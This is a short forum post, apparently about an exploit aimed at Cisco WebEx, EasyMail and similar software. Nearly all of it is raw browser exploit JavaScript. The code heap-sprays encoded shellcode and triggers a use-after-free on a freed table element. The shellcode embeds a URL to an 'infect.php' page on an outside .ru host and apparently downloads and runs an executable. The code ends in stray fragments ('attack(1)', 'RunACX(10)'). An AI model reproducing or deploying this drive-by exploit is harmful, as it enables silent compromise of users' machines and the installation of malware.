var payload = unescape('%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u552F%u7273%u3076%u2E34%u7572%u692F%u666E%u6365%u2E74%u6870%u3F70%u6469%u323D%u3936%u3F30%u6469%u323D%u3936%u2630%u7073%u3D6C%u3631');
var ret = 0x0c0c0c0c;
var heap_chunk_size = 0x40000;
var nopsled_size = heap_chunk_size - (payload.length * 2)
var nopsled = unescape('%u0c0c%u0c0c');
while (nopsled.length < nopsled_size){
nopsled += nopsled;
}
heap_chunks = new Array();
heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
for (var i = 0 ; i < heap_chunks_num ; i++) {
heap_chunks[i] = nopsled + payload;
}
var obj = document.createElement('table');
obj.click;
var obj_cp = obj.cloneNode();
obj.clearAttributes();
obj = null;
CollectGarbage();
var img = document.createElement('img');
img.src = unescape('%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC');
obj_cp.click;
} attack(1);
RunACX(10);
Topic: Exploit targeting Cisco WebEx, EasyMail etc... (Read 8766 times)